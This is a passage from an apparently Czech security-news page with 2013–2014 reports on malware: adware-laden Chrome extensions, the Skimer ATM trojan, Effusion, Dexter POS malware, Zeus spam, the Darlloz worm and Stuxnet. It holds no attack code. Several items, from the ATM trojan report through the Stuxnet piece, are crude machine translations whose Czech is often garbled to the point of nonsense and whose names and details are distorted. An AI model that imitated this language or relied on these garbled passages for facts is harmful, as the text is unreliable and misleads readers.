Druhým známým případem je doplněk Tweet This Page od Romana Skabičevského, který své dílo prodal loni v listopadu. Skabičevskij se podle svých slov rozhodl rozšíření prodat za 500 dolarů, protože neměl čas na jeho další zlepšování.
„Žena vystupující pod jménem Amanda mě kontaktovala s tím, že má zájem o mé rozšíření pro další vývoj,“ napsal Skabičevskij v e-mailu. Sice mu to prý přišlo divné, protože jeho doplněk je šířen jako open source, takže má k jeho kódu každý přístup a může na něm pracovat, přesto však na prodej kývl.
Agarwalův příběh zní podobně – své rozšíření prý prodal za čtyřmístnou sumu poté, co se mu ozvala nějaká žena. „O měsíc později přišli noví majitelé Feedly s aktualizací, kterou umístili na Chrome store. Update však nepřinesl žádné nové funkce ani neopravoval žádné chyby. Místo toho se v něm objevily reklamy,“ řekl Agarwal.
V obou případech však nejde o reklamy, se kterými se běžně setkáváme na internetu. Jde o neviditelné reklamy běžící na pozadí, které nahrazují každý webový odkaz odkazem na vybraný partnerský program. Jednoduše řečeno se tak po aktivaci rozšíření objeví na každé webové stránce adware.
Z hlediska autorů adwaru je tento přístup méně pracný, než kdyby sami vytvářeli nová rozšíření pro Chrome. Při nákupu zaběhlého doplňku si totiž kupují často i velkou uživatelskou základnu. Tato investice se jim tak obvykle velmi rychle vrátí.
Obě zneužitá rozšíření již na Chrome Store nenajdete. Google je zřejmě na popud uživatelů odstranil. Zatím se neví, jestli šlo o ojedinělé případy, nebo je rizikových přeprodaných doplňků v oběhu více.
Zpráva o adwaru v rozšířeních pro Chrome se začala rychle šířit. Vývojáři doplňku Honey prý byli hned několikrát kontaktováni autory adwaru a malwaru. Jeden z nich jim dokonce nabízel šestimístnou částku za každý měsíc, po který s ním budou přímo spolupracovat.
Microsoft prodloužil antivirovou podporu Windows XP do roku 2015
20.1.2014 Viry | Bezpečnost Všechny ostatní druhy uživatelských podpor skončí podle původního plánu již letos.
Přes 30 % všech desktopů po celém světě běžících stále na starém operačním systému Windows XP bude i příští rok chráněno proti malwaru. Microsoft se totiž rozhodl prodloužit o 1 rok anti-malwarovou podporu. To i přesto, že jeden z nejpopulárnějších operačních systémů všech dob letos v dubnu oficiálně odejde do důchodu.
Uživatelé Windows XP tak budou až do 14. července 2015 varováni před možnými riziky infekce a budou dostávat anti-malwarové aktualizace. O všechny ostatní druhy podpor - opravy chyb, softwarové aktualizace či zákaznickou podporu, však uživatelé přijdou podle plánu 8. dubna 2014.
Tuto zprávu pravděpodobně uvítají zejména firmy, které stále nepokročily v přechodu na novější verze Windows a jejich kritické aplikace by tak za několik měsíců běžely na zranitelných počítačích. Takových firem je i přes dlouhodobou kampaň Microsoft hodně.
Na trh se Windows XP dostaly v roce 2001 a rychle se staly nejpopulárnějším operačním systémem na světě. Na vrcholu je používalo přes 800 miliónů uživatelů.
Podle dat deníku The Economist běžely Windows XP ještě loni v dubnu na 39 % firemních počítačů.
Microsoft chtěl se systémem úplně skoncovat již několikrát. Vždy si to ale rozmyslel po negativní reakci ze strany uživatelů – v roce 2008 dokonce vznikla petice. Současné řešení bychom tak mohli označit za jakýsi kompromis.
Efektivní nové info trojské stěry karty z široce používaných bankomatů 18.1.2014 Viry
Vědci z Ruské AV závodním lékařem Web podařilo dostat své ruce na Trojan zaměřené na evidenci a shromažďování informací o kartě z jedné z nejrozšířenějších typů strojů ATM. Bohužel, neměli říkat, který z nich.
"Trojan.Skimer.18 není v žádném případě první backdoor nakazit software Bankomat, ale je to první cílové zařízení tak běžné na celém světě," vědci vysvětlil jeho význam. Trojan přichází v podobě dynamicky propojované knihovně (DLL) a se nahraje prostřednictvím infikované aplikace. Jakmile které získalo oporu na stroji, okamžitě vytvoří soubor protokolu, který bude ukládat ukradené informace -. Stopa 2 údaje (číslo karty / účtu, datum platnosti, servisní kód) a kódy PIN "Je pozoruhodné, že v zájmu zachování důvěrnost, výrobci bankomatů využívají speciální technologie, která usnadňuje šifrovaný přenos kódů PIN zadali do bankomatů, a šifrovací klíč je pravidelně aktualizován ze serveru banky, "že poukázal na to , ale dodal, že Trojan.Skimer.18 snadno obchází tuto ochranu a používá software bankomatu k dešifrování kódů PIN. Zločinci ovládat malware pomocí speciálně navržených vzorových karet. Po vložení do slotu pro paměťové karty v bankomatu, tyto karty, aby Trojan dialogové okno vyskočí a umožňují zločinci používat bankomaty klávesnice k interakci s malware . Pokud k tomu budete vyzváni, Trojan může odstranit sám nebo soubor protokolu z infikovaného bankomatu, restartujte počítač nebo změnit jeho provozní režim, a dokonce i sám aktualizovat pomocí aplikace z čipu master karty. Master karty mohou také "stáhnout" již ukradené informace po prvním kompresi souboru.
Chytrý malware distribuce kampaň je v současné době dělá kolech, v podobě e-mailů údajně dodávají licenční klíče pro řadu softwarových nabídky Adobe, varuje MX Lab.
Odesláno z jedné z mnoha zfalšovaných adresami používanými přimět oběti do podezření, že odesílatel je skutečně Adobe ( software@adobes.com , your_order@adobes.com , atd.), zpráva je obvykle variace na "Děkujeme vám za zakoupení [random Software Adobe]. Váš Adobe licence klíč je v přiloženém dokumentu níže. " Připojený soubor ZIP ( License_Key_ [random 6-místný alfanumerický kombinace]. zip ) obsahuje 209 kB velký License_Key_Document_Adobe_Systems_Incorporated.exe soubor, který je v současné době detekován jako nebezpečný podle 17. z 49 AV řešení používaných VirusTotal. je to Trojan umožňuje stahovat další škodlivé soubory z Internetu, a snaží se zabránit výzkumné pracovníky z analyzování a uživatelům špinění ji snaží odhalit využívání virtuálního stroje a známých forenzní nástroje, a ukončit AV produkty. Jako vždy, uživatelé se doporučuje mít na pozoru před nevyžádanými e-maily, a nikdy slepě následovat odkazy a stahovat soubory zahrnuté v nich.
Nový škodlivý kód útočí na Apache a Nginx
17.1.2014 Viry Podle mluvčího společnosti IntelCrawler se v tajných kyberzločineckých fórech objevila nabídka nového malwaru, který je vytvořen jako rozšiřující modul pro webové servery Apache a Nginx.
Nový malware, který dostal název Effusion, může podle popisu v reálném čase vkládat kód do webových stránek umístěných na napadených webových serverech. Vkládání kódu může vytvořit podmínky pro přesměrování na stránky kyberzločinců, kde mohou útočníci pomocí různých taktik sociálního inženýrství podvést uživatele a získat od něj citlivé údaje.
IntelCrawler hlásí, že Effusion pracuje se servery Nginx od verze 0.7 až do současné verze 1.4.4 a také s 32- nebo 64bitovou verzí Apache v systémech Linux nebo FreeBSD. Malware je maskován jako modul, který rozšiřuje základní funkce webového serveru. Škodlivý kód pak může vkládat zadaný obsah různých typů MIME, například JavaScript, HTML, nebo PHP do webových stránek nebo do speciálních formátovacích značek ve zdrojovém kódu stránek. Útočníci mohou také aktualizovat konfiguraci malwaru a vzdáleně sledovat změny kódu.
Malware má také schopnost filtrovat, což obtížnost odhalení neoprávněně vkládaného kódu dále zvyšuje. Effusion podporuje filtrování podle hlavičky, zdroje návštěv uživatelů, uživatelských klientů, adres IP nebo jejich rozsahů. Škodlivý software se současně snaží získat přístup superuživatele root k systému, aby mohl útočník na napadeném serveru podnikat další škodlivé aktivity.
Andrej Komarov, generální ředitel společnosti IntelCrawler, uvedl, že tvůrci modul Effusion na malwarových fórech nabízejí za 2 500 dolarů, což je na tamní poměry celkem vysoká cena. Ta má podle názoru bezpečnostních odborníků omezit počet uživatelů tohoto produktu.
Škodlivé moduly pro Apache nejsou žádnou novinkou, server Nginx se ovšem podobným nekalým záměrům prozatím vyhýbal. Podle analytické společnosti Netcraft má ovšem podíl Nginxu na světové scéně překonat hranici 14 % a stává se proto zajímavý i pro útočníky.
Uvedení malware v obraze 6.12.2013 Viry
Spammeři aktivně šíří malware pomocí falešné upozornění jménem různých finančních a bankovních institucí, rezervace a dodávky služeb a dalších firem. Arzenál triků, které používají zločinci je neustále aktualizován. Zejména v posledních letech jsme zaznamenali řadu anglickými a německém jazyce hromadnou korespondenci, ve které se útočníci snaží skrývat malware na základě fotografií a obrázků.
V říjnu, útočníci vyslali falešné oznámení prohlašovat, že je od T-Mobile, a telekomunikačním operátorem v Německu, který řekl, že uživatelé se jim dostalo MMS. Chcete-li e-mail vypadat legitimní, adresa odesílatele obsahoval oficiální firemní domény, i když e-mail sám byl poslán z jiné adresy. Tělo e-mailu, včetně kontaktní telefonní číslo odesílatele MMS a některé obecné informace vztahující se k odesílání a přijímání multimediálních zpráv.
Předpokládá fotografie s názvem '23-10-2013 13_64_09.jpeg.exe "nebyl v těle e-mailu, ale v přiloženém archivu '23-10-2013 43_69_10.zip". Podvodníci používají populární formát souboru obrázku JPEG v názvu souboru škodlivého v naději, že by se přesvědčit příjemce, že archiv skutečně obsahovat fotografii. Nicméně, uživatelé varování by si všimnout, že přípona souboru je fakt. Exe. Tento spustitelný soubor je detekován Kaspersky Lab jako Backdoor.Win32.Androm. Tento program umožňuje bot podvodníci vzdáleně spouštět příkazy na infikovaném počítači, například stažením a spuštěním další malware bez vědomí majitele.
V listopadu, spammeři používají Instagram, na populární video a foto-sdílení službu k šíření škodlivých e-mailů. Falešné oznámení zaslané na účet této služby informovat uživatele, že jejich fotografie byly zveřejněny v Instagram. Chcete-li zobrazit obrázek, příjemci byli požádáni, aby otevřít ZIP archiv, který údajně obsahoval grafický soubor "Photo DIG9048599868.jpeg.exe". To byl ve skutečnosti Trojan.Win32.Neurevt, multifunkční robot, který krade data uložená v prohlížeči (cookies a hesel), uživatelská jména a hesla zadat na stránkách a také herní kódy. Kromě toho, že slouží ke stažení a spuštění různých programů na oběť počítači, stejně jako vytvářet botnety pro DDoS útoky. Jedním ze specifických rysů bota je pokročilé funkce navrženy tak, aby proti různých bezpečnostních řešení. Například, to může blokovat zahájení anti-virus software a služby Windows Update, nebo zabránit uživateli v návštěvě webové stránky antivirových společností.
V listopadu jsme se ještě registrován další trik, ale tentokrát to nebylo se snaží obchodovat na jméno jakéhokoliv renomované společnosti nebo služby. E-maily v této škodlivého hromadnou korespondenci napodobil osobní korespondenci mezi přátele výměně soukromé fotografie. Fascinující záhlaví zprávy pozval příjemců vidět fotografie sebe nebo své chlapce / přítelkyně. Vlastní text obsažený emotikony a nesmyslné slova. Odesílatel adresy byly generovány automaticky, i když obsahovaly jména lidí. Stejně jako v jiných obdobných hromadných zásilek, e-mail včetně přiložený archiv s údajnou fotografii, která byla ve skutečnosti spustitelný dvojitá přípona souboru. Kaspersky Lab detekuje tento obrázek jako Trojan-Downloader.Win32.Agent - Trojan, který nainstaluje falešný antivirový program na počítači oběti. Výsledkem je, že infikovaný počítač neustále ukázal vyskočí oznámení o zjištěných virů. Chcete-li je odstranit, uživatel musel koupit plnou verzi tzv. antivirové řešení. Soubor s falešný antivirový program, který je detekován u nás jako Trojan-FakeAV.Win32.SmartFortress2012.ambh.
Nebezpečný soubor v tomto archivu má příponu. Scr, který je typický pro obrazovky Windows spořiče. Oba. Scr a rozšíření. Exe viz spustitelné soubory a mohou být použity spammery k instalaci malwaru.
Jedním z hlavních cílů útočníků, kteří šíří škodlivé e-mailů je získat přístup k počítači oběti. Spammeři často využívají zvědavost a bezstarostnost lidí, aby jim pomohl, jak to udělat. Infikovaný počítač je nejen zdrojem cenných osobních informací, ale může být také použit k útokům na jiných internetových uživatelů nebo velkých organizací a firem. Vaše zdvořilost a antivirové řešení by mohlo pomoci vyhnout se případným problémům v budoucnosti.
Nové Dexter Point-of-Sale Malware Kampaně objevil 5.12.2013 Viry
Tíživý Dexter point-of-sale malware objevil před více než rokem, zůstává aktivní především v Rusku, na Středním východě a jihovýchodní Asii, zatímco jeho bratranec Project Háček je najít podobný úspěch ve Spojených státech, pobízet odborníky, aby zvuk budíku jako rekreační obchod rozběhne.
Výzkumníci z Arbor Networks minulý měsíc našel dva servery, hosting malware se systémem Windows, ohlašuje nové aktivní kampaně.
Dexter a Project Hook se liší od tradičních point-of-prodej útoků, které se spoléhají na skimmery fyzicky instalované na koncových bodech, nebo phishingové e-maily lákají uživatele na počítačích se systémem Windows hosting software POS. Místo toho, malware je vstřikován do souborů hostovaných na serverech se systémem Windows před škrábání čísla kreditních karet, jak oni vstoupili prostřednictvím systému POS.
Arbor Networks senior analytik Curt Wilson řekl, že dva nové Dexter servery byly nalezeny v listopadu, vymáhání práva, jakož i finanční služby sdílení informací a analytické centrum (FS-ISAC) byli informováni. Wilson řekl během dvoutýdenního období, kdy výzkumníci Arbor se sledování aktivity na serverech, uviděli 533 nakažených koncové volání zpět do velení a řízení infrastruktury.
"Způsob, jakým se útočníci měli server nastavit, jsme viděli, údaje o kreditní kartě zveřejněny na webu," řekl Wilson. "Útočníci byli vymazání souborů protokolu pravidelně, takže není říct, jak dlouho se tyto kampaně probíhají."
Arbor identifikovány tři verze Dexter: Stardust, což je pravděpodobné, že původní verze, Millenium, a Zjevení. Zjevení je pravděpodobné, že nejnovější verze a je schopen pohybu odcizených dat a to nejen přes HTTP jako předchozí verze, ale i přes FTP, nejprve pro POS malware, řekl Wilson. Wilson dodal, že výzkumníci Arbor nebyli schopni určit, jak počáteční infekce se děje. Oba příkaz servery, řekl, jsou již online.
Dexter byl objeven před více než rokem a hlásí vědci na Seculert, která oznámila v té době, že kampaně byly prohlašovat oběti na velkých maloobchodních operací, hotelů a restaurací. V té době tam byly oběti ve 40 zemích, většina z nich v USA a Velké Británii.
"Dexter se krade seznam procesů z infikovaného stroje, při analýze paměti obsahující procesů souvisejících s konkrétní POS software, hledá Track 1/2 Track údaje o kreditní kartě," napsal Seculert CTO Aviv Raff v BLOGPOST v prosinci loňského roku. "Tato data budou s největší pravděpodobností použity zločinci ke klonování kreditních karet, které byly použity v cílové POS systému."
Point-of-prodej systémů představují hackeři s cílovou bohaté prostředí. Tyto systémy jsou často dosažitelné on-line a jsou obvykle střeženy s výchozím nebo slabých hesel, která jsou hračkou pro hrubou silou nebo slovníkový útok. Poslední dva Porušení Vyšetřování Zprávy Verizon data jsou identifikována malých prodejců a poskytovatelů pohostinství jako primární oběti v takových oportunních útoků kvůli omezené bezpečnostních zdrojů.
Wilson uvedl, že některé z pronásledovaných stroje nebyly dedikované servery PoS, jeden zvláště byl také hostování fyzický systém řízení bezpečnosti, který běžel řízení přístupu a čtečky karet software.
"Data jsou exfiltrated, že jsme viděli naznačuje, že napadené stroje zdvojení funkcí a běží místě prodeje na počítači dělat něco jiného. PoS stroje by měla být věnována, uzamčena a mají zvláštní politiky uplatňované na to, "řekl Wilson. "To je špatná praxe tolik hromadit na jednom systému. Útočník s přístupem k údajům o kreditních kartách by mít rovněž přístup k cokoli jiného systému řízení má přístup taky. "
Wilson řekl, že počáteční infekce by mohla být pravda a to buď prostřednictvím podvodných e-maily lákají oběti na stránky hosting Dextera nebo projektu Hook, nebo útočníci využívají výchozí pověření k přístupu těchto systémů na dálku.
"S prázdniny, tam to bude více PoS činnost a větší objem transakcí. Teď by byl dobrý čas opevnit bezpečnosti, "řekl Wilson. "Základy by měly zahrnovat to. Existuje IDS podpisy napsané pro tento malware, a tam jsou ukazatele kompromisu plovoucí kolem, základní antimalware by měl zachytit proces, injekční techniky zde používané ".
Mezitím, Ars Technica dnes oznámila objev první botnet cílení point-of-prodej systémů . Los Angeles Bezpečnostní společnost s názvem IntelCrawler našli botnet, který byl napaden v blízkosti 150 Subway sendvičů obchodů krást 146.000 čísla kreditních karet.
Zeus - nyní baleny jako antivirové aktualizace 4.12.2013 Viry
Minulý týden Kaspersky Lab zjistila hromadnou korespondenci podvodných dopisů odeslaných v názvu předních IT poskytovatelů bezpečnostních. Tyto zprávy se zjištěné použity názvy produktů a služeb, které patří do společnosti Kaspersky Lab, McAfee, ESET NOD32 a mnoho dalších.
Text a celkové uspořádání každého dopisu následovalo stejnou šablonu, pouze jména odesílatelů "a řešení bezpečnosti IT uvedené v textu jsou rozdílné. Ve svých zprávách, že zločinci vyzval čtenáře, aby nainstalovat důležitou aktualizaci zabezpečení pro jeho / její bezpečnostní řešení k zajištění ochrany před nový kus malware pravděpodobně pustoší web. Chcete-li tak učinit, uživatel jednoduše potřeba otevřít přiložený ZIP archiv a spustit spustitelný soubor v něm. Není divu, že spisovatelé nutil své oběti, aby okamžitě jednat, spíše než trávit čas přemýšlet o tom, kdo by mohl být za tímto náhlým naléhavé dopisu.
Jeden z phishingových zpráv
Nicméně, dokonce i název přiloženého souboru by měl nastavit alarm zvonů pro uživatele: příliš mnoho čísel, což znamená, že byl zřejmě vygenerována za libovolným způsobem.
Jako ve skutečnosti, že je škodlivý program, v přiloženém archivu, detekovány produkty společnosti Kaspersky Lab jako Trojan-Spy.Win32.Zbot.qsjm. To Trojan patří k renomovaným Zeus / Zbot rodiny, a je navržen tak, aby krást důvěrné informace o uživateli, nejlépe bankovnictví a finančních dat. Pomocí tohoto malware, mohou počítačoví zločinci měnit obsah stránky bank výsadbou škodlivé skripty v nich ukrást data, ověřování, jako jsou přihlašovací údaje a bezpečnostních kódů. Chcete-li tyto endsTrojan-Spy.Win32.Zbot.qsjm také můžete vzít screenshoty a dokonce zachytit video, zachytit vstup z klávesnice, atd. Kromě toho tato Trojan je pozoruhodný v tom, že nemá přístup k předem stanovený C & C pro příjem příkazů a konfiguraci soubor, ale používá P2P protokol pro příjem těchto dat z jiných infikovaných počítačů.
Zde jsou některé další příklady zpráv, které obsahují nebezpečné přílohy, vše převzaté z konferencí, které jsme objevili.
Předmět linie těchto zpráv postupovat stejnou šablonu s zločinci jen změnou jména bezpečnostních produktů v nich. Tyto zprávy jsou posílány z poštovních schránek reálných uživatelů ", které byly zřejmě unesen poté, co jejich počítače byly infikovány škodlivým programem a stala se součástí botnetu.
Po tomto incidentu bychom chtěli připomenout čtenářům, že žádný seriózní zabezpečení IT výrobce pošle aktualizace zabezpečení pro svůj produkt na zip upevnění na e-mailovou adresu. Navíc, nedoporučujeme otevírání jakýkoliv soubor přiložený k e-mailu, pokud jste očekával, a vím, kdo je odesílatel.
Mýtus č. 6 - Hledání Advanced Malware Zastaví hrozby
4.12.2013 Viry
V téměř každé firmě IT prostředí dnes, objev instance pokročilé malware nutně znamená, že jste příliš pozdě na to zastavit. Každodenní malware lze zastavit na firewallu, protože jeho podpis je znám. Je to něco jako mít kontrolu TSA prostředek vaše ID na letišti. Pojďme provádět tuto analogii se po dobu jedné minuty. Rozšířené malware je jiný. To se může pokusit dostat přes jiné dveře bez agenta, nebo použijte legitimní ID v přední části nového agenta v obzvláště náročném brány, když je příliš pod tlakem, aby na místě je rozdíl ve výšce a rysy obličeje. Je-li letiště je dostatečně personálně, TSA agent uvnitř Možná jste si všimli něčeho podezřelého. Popadne rámeček videa a provozuje několik analýz - a zjistí, jak každý dobrý sandbox by, že letiště byla infiltrována prostřednictvím zero-day malware, který je zaměřen na vytváření zmatek co nejdříve. Problém samozřejmě je, že malware je již na letišti, někde, a někdo musí učinit rozhodnutí o tom, zda je to dost důležité najít toho chlapa, nebo ho nechat jít. Je příznačné, že může sandbox není učinit toto rozhodnutí. To může říct jen to, že systém byl infiltroval. To je rozdíl mezi zjištění pokročilé malware a zmrazení nebo zastavit to. Pokud jste byli schopni izolovat kopii podezřelého souboru a vzít si čas na analýzu mezi více komíny, správně identifikovat jako zero-day malware, pak jste jako bezpečnostní agent v kontrolní místnosti: víte, máte nějaký problém, ale nemůžete zastavit. Malware již chodech svou cestu do IT systému, dosáhla svého cíle, a velmi pravděpodobně nasazen jeho využití. Jediný způsob, jak skutečně zastavit moderní malware útoku je okamžitě šířit informace o malware v celém systému, takže soubor a jeho využití může být izolován a pevné , než se rozšíří do dalších míst. To vyžaduje systém, který je schopen inteligentně sdělování informací o bezpečnostních hrozbách na libovolném místě v systému, včetně serverů, koncových bodů a dálkového ovládání. Dále, že komunikace musí být obousměrná, protože využívají můžete získat přístup pomocí koncového bodu stejně snadno, jako to může proniknout firewall. Komunikace musí být schopen priorit hrozeb a stanovení vhodných reakcí, včetně izolace malware všude tam, kde se nachází. Jinými slovy, musí být celý systém bude schopen plně pochopit naléhavost a složitost hrozby. I v prostředí s informací o zabezpečení a správu událostí (SIEM) systému, nejvíce chybí tento dynamický, bezpečnostní integraci celého systému. Vzhledem k tomu, že byly ušitá pomocí kombinace patentovaných a otevřených systémů v průběhu mnoha let, které často postrádají potřebné situační povědomí. Je to, jako kdyby bezpečnostní velín mluví anglicky a stráže na patře jsou všechny mluví různými jazyky podpořené různými úrovněmi vědomí hrozeb. To je často říkal, že systém je jen tak dobrý, jako jeho nejslabší článek. Neschopnost izolovat instanci pokročilé malware, a ujistěte se, že se nešíří se , že slabým článkem. Ale to nemusí být tak. Opravdu bezpečné IT prostředí vyžaduje architekturu, která využívá inovativní technologie strategicky a efektivně integrované rychle najít , izolovat a napravovat pokročilé malware kdekoli v systému, od serverů koncových bodů, a to prostřednictvím real-time sdílení informací o životním prostředí hrozeb.
Nový červ cílí na linuxová PC i vestavěná zařízení
2.12.2013 Viry Malware se šíří díky zranitelnosti PHP objevené už v roce 2012.
Nový červ útočí na počítače s procesory x86 se systémem Linux a prostředím PHP a jeho varianty mohou být nebezpečné také pro zařízení, jako jsou domácí směrovače či set-top boxy založené na jiných rodinách procesorů.
Podle bezpečnostního týmu firmy Symantec se malware šíří prostřednictvím zranitelnosti v php-cgi, komponentě, která umožňuje, aby PHP běželo v konfiguraci CGI. Chyba zabezpečení nese označení CVE-2012-1823 a byla opravena v PHP 5.4.3 a 5.3.13 v květnu 2012.
Nový červ byl pojmenován Linux. Darlloz a byl vytvořen na základě ukázkového kódu z konce listopadu. Po svém spuštění červ útočí na náhodné adresy IP prostřednictvím dotazů HTTP POST, a pokud je cíl nezáplatovaný, nahraje na něj ze zdrojového serveru červ a pokračuje v hledání dalšího hostitele. Jediná varianta červa, která se zatím šíří, napadá pouze systémy s architekturou x86, protože škodlivý spustitelný kód stahovaný z útočícího serveru je formátu ELF architektur firmy Intel.
Nicméně podle zprávy Symantecu se na výchozím infikovanému serveru nacházejí také varianty červa pro jiné architektury, jako je ARM, PPC, MIPS a MIPSEL. Ty jsou často používány pro malá vestavěná zařízení, jako jsou domácí směrovače, kamery IP, set-top boxy a další. Ve zprávě se dále píše: „útočník se očividně snaží maximalizovat dopad infekce rozšířením cílů o prakticky libovolné zařízení se systémem Linux. Nicméně zatím nebyly potvrzeny žádné konkrétní útoky na nepočítačové cíle.“
Firmware řady integrovaných zařízení je postaven na nějaké formě Linuxu včetně webového serveru s podporou PHP kvůli webovému rozhraní pro správu. Podobná zařízení mohou být snadněji napadnutelná, protože jsou málokdy – pokud vůbec – záplatována. Záplatování vestavných či integrovaných zařízení nebylo ostatně pro uživatele nikdy jednoduché, mnoho výrobců nevydává pravidelné záplaty a opravy, a pokud už k tomu dojde, jejich uživatelé nebývají adekvátně informovány o bezpečnostních hrozbách, které oprava firmwaru řeší. Dalším důvodem může být to, že zařízení má natolik minimalizovaný hardware, že pro nové verze softwaru na nich není místo, dostatečná paměť nebo by jej nezvládl vlastní procesor.
Symantec uživatelům podobných zařízení doporučuje, aby nainstalovali poslední dostupnou verzi firmwaru včetně aktualizací, nastavili silná hesla správce a blokovali dotazy HTTP POST směřující na /cgi-bin/php, /cgi-bin/php5, /cgi-bin/php-cgi, /cgi-bin/php.cgi a /cgi-bin/php4 – ať už pomocí svého firewallu, nebo v každém individuálním zařízením, pokud to umožňuje.
Fake AV oznámení o aktualizaci dodat malware 23.11.2013 Viry Spamové e-maily zosobnění řadu antivirových výrobců byli spatřeni cílení ustarané uživatele po celém světě, nutit je stáhnout a spustit "důležitou aktualizaci systému."
"Je to velmi důležité pro instalaci této aktualizace zabezpečení díky novému malwaru v oběhu přes síť," říká v e-mailu. "Chcete-li dokončit akci, prosím dvojklikem na systému opravy KB923029 v příloze. Instalace bude probíhat v tichém režimu. Prosím, věnujte pozornost této záležitosti a informovat nás v případě, že to je problém. " Bohužel pro ty, kteří spadají na trik, přílohu e-mailu PSČ vlastně nese downloader Trojan, který, poté, co se obrátíte na vzdálený server, stáhne Zeus Trojan varianta z ní a nainstaluje jej na počítači obětí. To také vytvoří nový klíč registru, aby Zeus spustit pokaždé, když je počítač restartován. Podle společnosti Symantec výzkumníků, spam kampaň zosobňuje zabil známých AV společností, jako AntiVir, Avast, AVG, Avira, Kaspersky Lab, Trend Micro , Symantec, a další, a nabízí "aktualizace" pro různé AV řešení. Uživatelům se doporučuje, aby klikněte na odkazy v nebo stahovat přílohy z nevyžádané e-maily, a ne při odpovědi e-mailu poskytovat žádné osobní údaje. V tomto konkrétním případě, že pravopisné chyby v e-mailové bodu na to, že je falešný, ale uživatelé by měli mít na pozoru tohoto typu e-maily, i když jsou napsány správně.
Second Podívejte se na Stuxnet odhaluje Starší nebezpečná varianta 23.11.2013 Viry Stuxnet byl dvouhlavé bestie, jak se ukázalo, ten, který by si položil odpad k Natanzu jaderného zařízení, které je infikované, a ten, který by měl mít, podle odborníků účtů, zůstaly bez povšimnutí, pokud není pro hlučnější ale méně složité druhém útoku rutiny , která je nyní známé na celém světě.
Průmyslové řídící systém a SCADA expert Ralph Langner napsal článek pro časopis Foreign Policy a papír na svých internetových stránkách publikoval tento týden, že hází zpět kryty na starší, složitější a stealthier verzi malware, který je výrazně odlišný od druhého útoku rutina, která vznikla v roce 2010 ..
"Ukazuje se, že to bylo mnohem nebezpečnější, než cyberweapon, který je nyní podané v představách veřejnosti," napsal Langner. "Bez tohoto pozdějšího a mnohem jednodušší verzi, možná původní Stuxnet ještě dnes spát v archivech antivirových výzkumných pracovníků, která neprokáže svou totožnost jako jeden z nejagresivnějších kybernetické zbraně v historii."
Langner řekl starší, méně známé Stuxnet-zaveden v roce 2007, se zaměřil na systémy ochrany kolem kaskád odstředivek používaných k obohacování uranu v závodě. Útočníci byli velmi dobře vědomi nedostatků v návrhu rostlin a provádění procesu. Věděli, že Íránci byli spokojeni při přijímání procento vadných odstředivek, protože navrhl systém ochrany, která umožnila obohacení pokračovat uprostřed vypínací odstředivek, řekl Langner.
"Tento systém by mohl mít, aby v Natanzu v odstředivky spinning, ale také otevřel až do kybernetického útoku, který je tak daleko-out, vede to člověk musí klást otázku, zda jeho tvůrci by mohl být na drogách," napsal Langner.
Geniálně, malware měl možnost nahrávání 21 sekund činnosti z čidel systému ochrany, které ukazují zdravý proud činnosti. To, že 21 sekund byl ovinutý znovu a znovu na sledování obrazovky, když byl útok proveden. Inženýři mysleli, že sledujete procesu obohacování hučení podél, jak bylo navrženo, že místo bylo vymkl kontrole. Malware napadl průmyslové regulátory postavený Siemens, uzavírací ventily zásadní způsobuje tlak jít nahoru, plyny shromažďovat a odstředivky se obrazně vyhodit do povětří.
Útočníci, Langner řekl, mohli nechat doslova vyhodit do vzduchu, což způsobuje katastrofické zničení. Udělali to, udržet jejich kryt jako výsledek, řekl. "Implementace útoku s extrémně úzké monitorování tlaku a stavu odstředivky naznačuje, že útočníci místo toho dával velký pozor, aby nedošlo k závažnému poškození," napsal Langner.
Analýza Langner v útoku to tzv. over-inženýrství pro daný úkol, a že jakákoliv chybička by riskoval odhalení Íránci. Dva roky poté, co první Stuxnet byl na místě, v roce 2009, byla zavedena druhá fáze.
Varianta napadl další kontrolní proces, systém, který řízené otáčky rotoru v odstředivek a byl self-replikace červ, který se přestěhoval do sítě elektrárny a na přenosné USB disky, starší verze, Langner řekl, byla záměrně instalovány na rostlinných počítačů, pravděpodobně by Agent z útočníků.
"To naznačuje, že útočníci ztratili schopnost transportovat malware na místo určení přímo infikovat systémy oprávněným pracovníkům, nebo že odstředivka pohonný systém byl nainstalován a nakonfigurován jinými stranami, které přímý přístup nebylo možné," napsal Langner .
Tato verze Stuxnet byl dobře zdokumentován, od jeho použití řady Windows zero-day využije a malware podepsaných s ukradenými digitálních certifikátů společnosti Microsoft. Langner řekl, tato verze Stuxnet byl napsán hackery, kvalifikovaných v psaní škodlivý kód, přičemž první útok byl kódován vedle odborníků adept v průmyslových řídicích systémů, není IT. Langner poukazuje prstem na Národní bezpečnostní agentury jako autoři Stuxnet, volat to jediné logické místo pro jeho rozvoj.
Tato verze a přístup k útočení jaderných kapacit Íránce přimějí vlevo otisky prstů-podivné chování v průmyslových procesech, které by mohly, a by být detekován. A zatímco útočníci by mohlo způsobit katastrofální zničení kdykoliv, Langner odhaduje, že místo toho nastavit jaderný program země zpět pouhé dva roky.
"Útočníci byli v pozici, kdy by mohl být zlomený krk oběti, ale oni si vybrali nepřetržitý periodický udušení místo," napsal Langner. "Stuxnet je low-výnos zbraň s celkovým záměrem snížit životnost íránských odstředivek a vytváření fantazie kontrolní systémy Íránci" se objeví nad jejich chápání. "
Langner také spekuluje, že Stuxnet nebyl postaven na útěku za Natanz zdí, ale ano, pravděpodobně prostřednictvím smluvních partnerů, kteří pracovali na závod opouští s notebooky nakažených virem Stuxnet a připojením je ve v jiných průmyslových zařízeních, kde bylo uzavřeno. Stuxnet byl navržen tak, aby rozšířil jen v místních sítích, nebo prostřednictvím přenosných disků, řekl Langner.
On také psal, že to bylo pravděpodobně záměrem útočníků ", aby Stuxnet šířit, protože malware hlásí adresy a názvy hostitelů infikovaných systémů IP na příkazovém infrastruktury. Útočníci mohli sledovat pohyb dodavatelů, pravděpodobně v naději, že si všímat jiných jaderných zařízení v Íránu působící pod radarem, napsal.
Nebezpečí také je, že v budoucnu jako zbraně útoky, jako Stuxnet může sledovat tento stejnou cestou do zařízení, protože, jak Langner řečeno, dodavatelé jsou dobří v technických úkolů, ale mizerný v kybernetické bezpečnosti a může být bezděčné pěšáky v nasazení další takovou zbraň kdykoli.
Langner odhaduje, že 50 procent z investic do Stuxnet byl uveden do úkrytu útok, budoucí útoky mohou vyžadovat stejný druh investice, a proto se nemusí zdroje národního státu jako Stuxnet ano, Langner napsal.
"A na rozdíl od Stuxnet útočníků, tato protivníci jsou také mnohem větší pravděpodobnost, že po civilní kritické infrastruktury. Nejen, že jsou tyto systémy ještě dostupné, ale jsou standardizované, "napsal.
